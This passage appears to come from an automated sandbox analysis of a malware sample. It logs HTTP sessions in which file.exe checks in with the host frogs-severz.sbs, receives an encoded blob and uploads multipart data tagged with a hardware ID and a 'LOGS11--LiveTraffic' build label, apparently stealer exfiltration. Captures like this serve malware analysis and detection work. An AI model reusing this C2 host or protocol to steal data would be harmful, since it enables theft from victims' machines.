                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RAbi4HF640qQJUu3%2Brm5tBsvCBw3tMhp0ibltTYLXuMkW7k4Qr6atDuXORBFlIr24IUBI%2BxXFoTQ4YkKxPd5qcFVCZcGC2NeY6F7mT5IKmqwUsHmqd0%2FxN43lVNAVcwfsSsB"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e8003474d184402-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2146&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=907&delivery_rate=1333333&cwnd=182&unsent_bytes=0&cid=26495f04854b889d&ts=693&x=0"
                                                                      2024-11-25 07:44:19 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                      Data Ascii: 2ok
                                                                      2024-11-25 07:44:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.949728104.21.88.2504437660C:\Users\user\Desktop\file.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-25 07:44:20 UTC264OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 53
                                                                      Host: frogs-severz.sbs
                                                                      2024-11-25 07:44:20 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                      Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                      2024-11-25 07:44:21 UTC1007INHTTP/1.1 200 OK
                                                                      Date: Mon, 25 Nov 2024 07:44:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=18q0q3kvvp79cug91e2lb5m072; expires=Fri, 21-Mar-2025 01:31:00 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wdGiMKUTqq2e6o5%2F%2FtPRoHTcvqLrM7U50vWcPOEo0NYKKfzCehdfAjytxVcZJte8B8RA9XHxIKaQ1VXy8D98B8vI7L%2F57rpAIOgdoI5PydYQCZExsEqKmPUkYgI68igKZFdr"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e8003537a0a4237-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1558&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=953&delivery_rate=1819314&cwnd=194&unsent_bytes=0&cid=f07b5a31aabbf409&ts=697&x=0"
                                                                      2024-11-25 07:44:21 UTC362INData Raw: 34 34 36 63 0d 0a 55 39 46 79 34 33 2f 5a 4b 65 72 61 2b 52 58 6e 73 36 41 35 52 2b 72 72 38 50 31 6e 53 4c 77 34 51 47 44 38 74 68 4d 42 46 57 38 6f 38 77 54 42 52 65 30 46 79 4b 6d 63 4e 39 33 48 30 6b 77 69 78 73 6d 52 6d 55 56 79 32 6c 6b 73 45 35 6d 61 4d 58 64 34 54 57 6d 33 45 34 38 4d 76 41 58 49 76 34 45 33 33 65 6a 62 47 79 4b 45 79 63 72 66 41 69 4c 65 57 53 77 43 6e 64 31 38 63 58 6b 4d 4f 37 30 56 69 78 71 36 54 59 75 32 6c 48 43 43 31 73 46 54 4b 59 4f 47 6d 4a 42 46 5a 4a 35 64 4f 6b 4c 47 6c 46 35 6b 59 51 34 65 73 41 47 49 58 61 51 46 6b 66 69 63 65 38 57 4a 67 6c 67 69 69 49 65 57 6d 51 77 67 31 46 41 6b 41 35 6a 63 59 32 68 7a 42 7a 75 7a 46 6f 6f 51 73 31 6d 47 76 4a 4e 37 68 4e 7a 42 47 32 76 49 6a 6f 72 66 58 57 71 4e 61 43 45 54 6a
                                                                      Data Ascii: 446cU9Fy43/ZKera+RXns6A5R+rr8P1nSLw4QGD8thMBFW8o8wTBRe0FyKmcN93H0kwixsmRmUVy2lksE5maMXd4TWm3E48MvAXIv4E33ejbGyKEycrfAiLeWSwCnd18cXkMO70Vixq6TYu2lHCC1sFTKYOGmJBFZJ5dOkLGlF5kYQ4esAGIXaQFkfice8WJglgiiIeWmQwg1FAkA5jcY2hzBzuzFooQs1mGvJN7hNzBG2vIjorfXWqNaCETj
                                                                      2024-11-25 07:44:21 UTC1369INData Raw: 67 4d 50 4a 55 69 69 46 69 5a 2b 56 43 69 6e 65 58 53 67 49 6b 64 35 31 62 6e 6f 4c 4d 62 4e 51 7a 31 32 38 55 38 6a 67 32 31 53 41 77 63 56 58 4d 38 71 7a 30 6f 42 4c 4d 35 35 64 4c 6b 4c 47 6c 48 6c 6d 64 41 34 36 76 42 4f 4a 46 71 6c 4c 6d 72 36 57 63 70 66 58 78 31 55 76 69 35 75 59 6b 51 4d 70 31 31 45 72 42 35 6e 51 4d 53 30 33 43 69 6e 7a 53 4d 45 38 74 6b 43 45 73 6f 78 33 78 63 36 4d 51 6d 57 50 68 64 4c 48 52 53 37 66 58 69 4d 47 6b 4e 70 31 62 33 45 44 50 4c 77 57 69 78 32 38 51 59 43 77 6d 6e 71 4f 33 73 4a 65 4b 49 79 50 6e 70 34 41 61 70 41 61 4a 52 72 65 6a 44 46 4e 63 41 34 6a 38 53 57 43 45 37 56 4d 6e 76 69 45 4f 5a 79 52 78 56 64 6c 30 4d 6d 63 6d 67 6f 34 33 30 67 6e 44 49 7a 59 64 47 56 36 44 6a 2b 7a 46 59 59 51 74 55 32 50 75 35 4e
                                                                      Data Ascii: gMPJUiiFiZ+VCineXSgIkd51bnoLMbNQz128U8jg21SAwcVXM8qz0oBLM55dLkLGlHlmdA46vBOJFqlLmr6WcpfXx1Uvi5uYkQMp11ErB5nQMS03CinzSME8tkCEsox3xc6MQmWPhdLHRS7fXiMGkNp1b3EDPLwWix28QYCwmnqO3sJeKIyPnp4AapAaJRrejDFNcA4j8SWCE7VMnviEOZyRxVdl0Mmcmgo430gnDIzYdGV6Dj+zFYYQtU2Pu5N
                                                                      2024-11-25 07:44:21 UTC1369INData Raw: 56 64 6c 30 4d 6d 65 6c 67 55 68 31 46 34 69 42 5a 50 52 63 6d 52 30 41 44 61 35 48 6f 59 5a 74 30 4b 46 76 70 74 77 67 64 54 51 58 69 79 45 68 64 4c 52 52 53 33 47 47 6e 70 43 73 64 4e 6e 59 46 67 4f 49 4c 70 51 6e 6c 4f 69 43 34 2b 30 32 79 2f 46 31 73 64 54 4c 6f 36 42 6b 6f 30 41 4a 4e 56 62 4b 41 53 66 32 58 31 6c 64 77 77 78 74 52 79 42 47 72 78 5a 6d 72 32 64 5a 59 2b 52 6a 42 73 69 6b 4d 6e 4b 33 7a 4d 36 79 55 73 30 51 4b 76 58 66 32 31 77 47 33 47 73 58 70 68 64 76 45 66 49 34 4e 74 38 68 64 33 46 55 79 4f 4d 67 5a 32 51 44 44 6a 66 56 69 77 51 6d 64 52 34 62 58 67 42 4f 4c 34 58 6a 42 61 78 52 6f 79 2f 6d 6a 66 4c 6b 63 56 44 5a 64 44 4a 70 49 38 49 4a 76 42 52 4c 67 76 65 79 7a 39 36 4e 77 6f 39 38 30 6a 42 47 62 64 44 67 72 65 53 66 59 2f 65
                                                                      Data Ascii: Vdl0MmelgUh1F4iBZPRcmR0ADa5HoYZt0KFvptwgdTQXiyEhdLRRS3GGnpCsdNnYFgOILpQnlOiC4+02y/F1sdTLo6Bko0AJNVbKASf2X1ldwwxtRyBGrxZmr2dZY+RjBsikMnK3zM6yUs0QKvXf21wG3GsXphdvEfI4Nt8hd3FUyOMgZ2QDDjfViwQmdR4bXgBOL4XjBaxRoy/mjfLkcVDZdDJpI8IJvBRLgveyz96Nwo980jBGbdDgreSfY/e
                                                                      2024-11-25 07:44:21 UTC1369INData Raw: 66 4a 33 4e 38 43 4d 70 34 43 59 69 32 35 34 54 4e 43 54 55 30 75 2f 51 6e 42 47 72 63 4c 30 50 69 58 64 49 6e 5a 7a 56 30 73 68 49 4f 62 6c 41 6b 68 32 6c 59 72 42 35 6a 56 64 47 5a 32 43 54 32 35 46 6f 49 65 74 45 53 48 73 4e 73 35 78 64 62 61 47 33 33 49 72 49 57 55 43 79 79 65 52 57 77 62 33 74 4e 39 49 79 39 4e 50 62 6f 57 68 78 69 33 53 6f 36 77 6e 6e 2b 42 30 4d 52 64 4a 6f 65 4e 6c 35 34 4b 4c 74 4a 55 4b 41 4f 66 32 48 70 73 66 41 68 78 2f 56 43 47 42 66 73 54 79 49 6d 59 59 5a 4c 42 7a 68 73 36 78 70 44 53 6d 41 6c 71 68 68 6f 6a 45 4a 54 65 66 32 5a 34 43 44 4b 38 46 34 77 62 74 30 47 42 73 4a 31 34 6a 4d 50 42 56 79 75 50 68 35 36 52 43 43 44 64 56 32 4a 4d 33 74 4e 70 49 79 39 4e 48 62 51 64 72 78 61 33 54 4d 69 6e 31 57 37 46 31 73 34 62 66
                                                                      Data Ascii: fJ3N8CMp4CYi254TNCTU0u/QnBGrcL0PiXdInZzV0shIOblAkh2lYrB5jVdGZ2CT25FoIetESHsNs5xdbaG33IrIWUCyyeRWwb3tN9Iy9NPboWhxi3So6wnn+B0MRdJoeNl54KLtJUKAOf2HpsfAhx/VCGBfsTyImYYZLBzhs6xpDSmAlqhhojEJTef2Z4CDK8F4wbt0GBsJ14jMPBVyuPh56RCCDdV2JM3tNpIy9NHbQdrxa3TMin1W7F1s4bf
                                                                      2024-11-25 07:44:21 UTC1369INData Raw: 70 41 6a 72 4f 57 57 41 7a 69 4e 64 6e 61 48 6f 42 63 61 78 65 6d 46 32 38 52 38 6a 67 32 33 47 4b 32 4d 46 55 4a 49 47 46 6e 35 6f 4d 4c 39 39 63 4a 67 69 55 31 48 64 6c 64 67 67 37 73 42 47 4c 46 4c 78 44 6a 37 75 4a 4e 38 75 52 78 55 4e 6c 30 4d 6d 37 6d 42 63 6b 7a 68 6f 39 54 49 65 55 64 6d 38 33 56 58 47 33 47 6f 34 5a 76 45 65 4f 76 5a 31 36 68 4e 37 44 57 79 71 4d 67 70 75 5a 42 43 66 62 56 79 59 51 6c 4e 39 2b 62 33 34 42 50 50 4e 65 77 52 71 6a 43 39 44 34 71 6e 71 4c 33 38 56 4e 5a 5a 66 48 69 39 38 43 4a 70 34 43 59 67 4f 53 32 33 4a 73 64 41 34 77 75 51 4b 54 45 62 4a 44 6a 62 53 51 65 59 50 44 78 46 51 73 69 34 71 62 6d 41 30 6d 31 46 6b 6c 51 74 43 55 64 6e 73 33 56 58 47 51 42 35 45 51 2b 31 54 47 6f 64 74 77 69 5a 47 61 47 79 32 46 67 5a
                                                                      Data Ascii: pAjrOWWAziNdnaHoBcaxemF28R8jg23GK2MFUJIGFn5oML99cJgiU1Hdldgg7sBGLFLxDj7uJN8uRxUNl0Mm7mBckzho9TIeUdm83VXG3Go4ZvEeOvZ16hN7DWyqMgpuZBCfbVyYQlN9+b34BPPNewRqjC9D4qnqL38VNZZfHi98CJp4CYgOS23JsdA4wuQKTEbJDjbSQeYPDxFQsi4qbmA0m1FklQtCUdns3VXGQB5EQ+1TGodtwiZGaGy2FgZ
                                                                      2024-11-25 07:44:21 UTC1369INData Raw: 31 31 34 71 41 5a 37 51 64 57 52 79 44 6a 32 34 46 34 49 53 76 30 4b 47 73 5a 51 33 79 35 48 46 51 32 58 51 79 62 4f 45 42 69 62 54 47 6a 31 4d 68 35 52 32 62 7a 64 56 63 62 38 65 68 42 32 78 54 59 79 39 6e 58 32 41 30 63 6c 59 4b 6f 79 50 6c 70 41 46 49 64 64 62 4a 41 65 55 33 33 64 75 64 41 73 33 38 31 37 42 47 71 4d 4c 30 50 69 37 62 49 6a 64 78 52 73 36 78 70 44 53 6d 41 6c 71 68 68 6f 70 44 70 72 54 63 57 35 30 42 54 53 33 47 6f 51 64 73 31 6d 41 75 4a 78 6c 6c 39 48 4c 58 69 6d 4c 69 5a 61 5a 44 43 7a 64 58 6d 4a 4d 33 74 4e 70 49 79 39 4e 48 4c 38 58 71 42 71 67 43 35 66 32 67 6a 65 43 33 59 49 44 5a 59 6d 43 6d 4a 41 49 4b 64 68 5a 4b 51 65 55 31 58 5a 72 65 68 38 79 76 42 2b 46 48 62 52 4e 6a 72 6d 55 63 59 4c 59 77 31 4d 69 79 4d 66 53 6d 42 31
                                                                      Data Ascii: 114qAZ7QdWRyDj24F4ISv0KGsZQ3y5HFQ2XQybOEBibTGj1Mh5R2bzdVcb8ehB2xTYy9nX2A0clYKoyPlpAFIddbJAeU33dudAs3817BGqML0Pi7bIjdxRs6xpDSmAlqhhopDprTcW50BTS3GoQds1mAuJxll9HLXimLiZaZDCzdXmJM3tNpIy9NHL8XqBqgC5f2gjeC3YIDZYmCmJAIKdhZKQeU1XZreh8yvB+FHbRNjrmUcYLYw1MiyMfSmB1
                                                                      2024-11-25 07:44:21 UTC1369INData Raw: 67 57 4a 32 7a 45 74 4e 77 4a 78 36 79 6e 42 46 4c 78 51 6d 61 36 57 5a 34 4b 52 2f 52 56 6c 6b 4d 6e 4b 33 7a 41 70 30 46 51 6c 46 49 2b 5a 56 6e 56 39 43 69 47 30 42 34 35 64 39 51 75 4f 2b 4d 4d 6b 79 35 48 47 53 6d 58 51 32 63 44 45 55 48 6d 4a 43 6e 41 64 30 4d 30 78 64 54 64 56 59 2f 31 51 6b 31 33 6a 43 38 2b 37 69 57 57 44 30 74 52 59 59 72 61 33 74 59 55 49 4c 4d 6c 4c 48 44 79 5a 7a 6e 78 6c 59 42 78 39 70 68 4f 50 45 37 78 64 79 50 62 62 65 4d 57 4a 2b 78 74 74 79 4c 62 63 33 78 31 71 68 68 6f 58 41 5a 44 61 64 6e 56 6d 51 42 61 70 48 59 63 4b 71 67 76 47 2b 4a 30 33 33 59 47 4d 47 79 47 5a 79 63 72 50 56 33 47 4c 43 58 56 53 7a 4d 73 2f 65 6a 63 62 63 65 74 43 7a 31 32 70 43 39 44 34 33 48 53 58 77 38 52 59 4d 34 76 4f 72 4b 45 72 4c 64 68 66
                                                                      Data Ascii: gWJ2zEtNwJx6ynBFLxQma6WZ4KR/RVlkMnK3zAp0FQlFI+ZVnV9CiG0B45d9QuO+MMky5HGSmXQ2cDEUHmJCnAd0M0xdTdVY/1Qk13jC8+7iWWD0tRYYra3tYUILMlLHDyZznxlYBx9phOPE7xdyPbbeMWJ+xttyLbc3x1qhhoXAZDadnVmQBapHYcKqgvG+J033YGMGyGZycrPV3GLCXVSzMs/ejcbcetCz12pC9D43HSXw8RYM4vOrKErLdhf
                                                                      2024-11-25 07:44:21 UTC1369INData Raw: 4e 6e 63 6a 6f 71 50 37 51 52 6c 77 32 73 52 4d 6a 32 32 33 48 46 69 5a 41 56 5a 59 79 59 30 73 64 56 65 49 55 50 63 56 58 4f 68 6d 34 74 62 6b 30 6e 38 30 6a 54 55 2f 74 5a 79 4f 44 62 4d 49 62 44 30 46 30 6d 6e 6f 72 56 6f 54 73 4e 30 46 30 6a 46 49 37 44 66 69 78 5a 4f 78 43 4e 4c 70 51 65 74 55 57 50 72 6f 6f 33 79 35 48 4e 47 33 32 78 79 64 72 66 4f 6d 53 65 51 6d 4a 61 33 75 46 79 62 58 6b 4b 4a 36 4a 64 70 68 4f 38 53 70 36 6f 6a 48 6a 4b 2f 2f 52 36 5a 63 62 4a 6c 4e 39 64 65 4a 41 61 4a 68 50 65 6a 43 45 78 4c 46 68 69 35 45 44 54 41 76 56 53 79 4b 37 62 4c 39 65 66 67 6b 6c 6c 30 4d 6e 56 6e 42 63 34 32 46 6b 30 41 64 6e 71 54 30 52 35 43 6a 43 6c 41 49 77 52 6d 6b 69 5a 73 71 56 4a 6b 4e 4c 4d 56 53 4b 65 6d 4e 4c 52 52 53 57 65 41 68 74 43 31
                                                                      Data Ascii: NncjoqP7QRlw2sRMj223HFiZAVZYyY0sdVeIUPcVXOhm4tbk0n80jTU/tZyODbMIbD0F0mnorVoTsN0F0jFI7DfixZOxCNLpQetUWProo3y5HNG32xydrfOmSeQmJa3uFybXkKJ6JdphO8Sp6ojHjK//R6ZcbJlN9deJAaJhPejCExLFhi5EDTAvVSyK7bL9efgkll0MnVnBc42Fk0AdnqT0R5CjClAIwRmkiZsqVJkNLMVSKemNLRRSWeAhtC1
                                                                      2024-11-25 07:44:21 UTC1369INData Raw: 4a 4d 78 79 68 46 35 45 65 2b 57 65 50 74 5a 64 4a 75 2b 62 54 58 44 58 4b 72 35 47 4a 42 6d 71 51 47 6a 70 43 78 70 52 63 63 58 41 64 4d 76 45 38 68 68 43 33 43 35 66 32 67 6a 65 54 6b 5a 6f 49 61 38 69 62 30 73 64 46 62 64 31 49 4d 41 53 64 77 6e 49 6b 53 54 4d 63 6f 52 65 52 48 76 6c 36 68 62 79 4e 59 6f 62 42 78 57 55 62 70 5a 75 56 6a 77 5a 6f 2b 32 42 67 4d 34 6a 58 63 57 31 77 54 58 2f 7a 43 4d 46 46 2b 32 61 61 76 34 74 30 78 2f 54 34 47 52 53 65 69 70 4b 52 41 6d 72 42 46 44 74 43 69 4a 51 70 4d 44 6c 4e 49 2f 4e 49 77 56 71 31 52 6f 6d 37 6c 58 53 58 77 38 52 59 4d 34 76 4f 72 4b 45 71 49 64 39 4b 4c 78 4f 54 30 47 64 64 53 53 6f 33 74 68 65 2f 49 34 78 61 6a 36 6a 5a 55 59 62 48 77 52 74 72 79 4a 48 53 78 30 55 4e 32 46 38 6c 51 74 43 55 64 53
                                                                      Data Ascii: JMxyhF5Ee+WePtZdJu+bTXDXKr5GJBmqQGjpCxpRccXAdMvE8hhC3C5f2gjeTkZoIa8ib0sdFbd1IMASdwnIkSTMcoReRHvl6hbyNYobBxWUbpZuVjwZo+2BgM4jXcW1wTX/zCMFF+2aav4t0x/T4GRSeipKRAmrBFDtCiJQpMDlNI/NIwVq1Rom7lXSXw8RYM4vOrKEqId9KLxOT0GddSSo3the/I4xaj6jZUYbHwRtryJHSx0UN2F8lQtCUdS


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.949734104.21.88.2504437660C:\Users\user\Desktop\file.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-25 07:44:23 UTC276OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=A5K45MZSF13L
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 12815
                                                                      Host: frogs-severz.sbs
                                                                      2024-11-25 07:44:23 UTC12815OUTData Raw: 2d 2d 41 35 4b 34 35 4d 5a 53 46 31 33 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 30 30 38 31 44 36 41 36 30 43 38 43 34 33 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 41 35 4b 34 35 4d 5a 53 46 31 33 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 41 35 4b 34 35 4d 5a 53 46 31 33 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 41 35 4b 34 35 4d 5a 53
                                                                      Data Ascii: --A5K45MZSF13LContent-Disposition: form-data; name="hwid"E0081D6A60C8C436D7CBBD6DF28D3732--A5K45MZSF13LContent-Disposition: form-data; name="pid"2--A5K45MZSF13LContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--A5K45MZS
                                                                      2024-11-25 07:44:23 UTC1010INHTTP/1.1 200 OK
                                                                      Date: Mon, 25 Nov 2024 07:44:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=k20lngete9gm5oh107tmhjoe7i; expires=Fri, 21-Mar-2025 01:31:02 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ciUF4KLlDaAs6XhKWS87WRnJZ4TfAiYHECttw1P2YY43HaQI9oys0GPGFNT7xDBMJIA4zZfW%2BhDRRiyjGHSS0Js9n51N157W%2FLjKWQjpbzBfpfoX6wD5Vh6d%2FhEZR3aRhbFf"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e800360db7c428b-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1596&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2839&recv_bytes=13749&delivery_rate=1796923&cwnd=235&unsent_bytes=0&cid=d43bf1b943afd789&ts=962&x=0"
                                                                      2024-11-25 07:44:23 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                      Data Ascii: eok 8.46.123.75
                                                                      2024-11-25 07:44:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.949740104.21.88.2504437660C:\Users\user\Desktop\file.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-25 07:44:25 UTC279OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=P14SZ2J0R2C1792
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 15051
                                                                      Host: frogs-severz.sbs
                                                                      2024-11-25 07:44:25 UTC15051OUTData Raw: 2d 2d 50 31 34 53 5a 32 4a 30 52 32 43 31 37 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 30 30 38 31 44 36 41 36 30 43 38 43 34 33 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 50 31 34 53 5a 32 4a 30 52 32 43 31 37 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 31 34 53 5a 32 4a 30 52 32 43 31 37 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d
                                                                      Data Ascii: --P14SZ2J0R2C1792Content-Disposition: form-data; name="hwid"E0081D6A60C8C436D7CBBD6DF28D3732--P14SZ2J0R2C1792Content-Disposition: form-data; name="pid"2--P14SZ2J0R2C1792Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
                                                                      2024-11-25 07:44:26 UTC1010INHTTP/1.1 200 OK
                                                                      Date: Mon, 25 Nov 2024 07:44:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=nhmt17njucl75qmqdg30b08ag2; expires=Fri, 21-Mar-2025 01:31:05 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hmrztSjuA3DPjvgvvAEOULPK5rn6eA0YRqiGYZZl2sSJd9x6bIbkZdCrVdPyASk9NJnPWnCffrdBugpnWcvp937vAWXS0yKYG6k%2FouNzU4rExw8g9DybNQMUHnOEbm20%2BHxZ"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e80036fbe598cc5-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1972&sent=11&recv=18&lost=0&retrans=0&sent_bytes=2840&recv_bytes=15988&delivery_rate=1411992&cwnd=243&unsent_bytes=0&cid=76ffa09ceafb60cb&ts=1119&x=0"
                                                                      2024-11-25 07:44:26 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                      Data Ascii: eok 8.46.123.75
                                                                      2024-11-25 07:44:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.949746104.21.88.2504437660C:\Users\user\Desktop\file.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-25 07:44:28 UTC282OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=A8CHGFSQ06VHXG923T
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 20585
                                                                      Host: frogs-severz.sbs
                                                                      2024-11-25 07:44:28 UTC15331OUTData Raw: 2d 2d 41 38 43 48 47 46 53 51 30 36 56 48 58 47 39 32 33 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 30 30 38 31 44 36 41 36 30 43 38 43 34 33 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 41 38 43 48 47 46 53 51 30 36 56 48 58 47 39 32 33 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 41 38 43 48 47 46 53 51 30 36 56 48 58 47 39 32 33 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54
                                                                      Data Ascii: --A8CHGFSQ06VHXG923TContent-Disposition: form-data; name="hwid"E0081D6A60C8C436D7CBBD6DF28D3732--A8CHGFSQ06VHXG923TContent-Disposition: form-data; name="pid"3--A8CHGFSQ06VHXG923TContent-Disposition: form-data; name="lid"LOGS11--LiveT
